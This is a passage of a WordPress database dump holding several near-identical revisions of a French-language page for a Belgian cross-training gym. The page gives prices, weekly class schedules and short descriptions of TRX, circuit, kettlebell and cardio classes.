padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:53:51', '2013-07-03 16:53:51', '', 11, 'http://www.crosstrainingcenter.be/?p=177', 0, 'revision', '', 0),
(178, 1, '2013-07-03 17:01:04', '2013-07-03 17:01:04', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table class=\"tabb\">\r\n<tr>\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:01:04', '2013-07-03 17:01:04', '', 11, 'http://www.crosstrainingcenter.be/?p=178', 0, 'revision', '', 0),
(182, 1, '2013-07-03 17:05:17', '2013-07-03 17:05:17', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:05:17', '2013-07-03 17:05:17', '', 11, 'http://www.crosstrainingcenter.be/?p=182', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(179, 1, '2013-07-03 17:01:59', '2013-07-03 17:01:59', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr class=\"tabb\">\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr class=\"tabb\">\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; 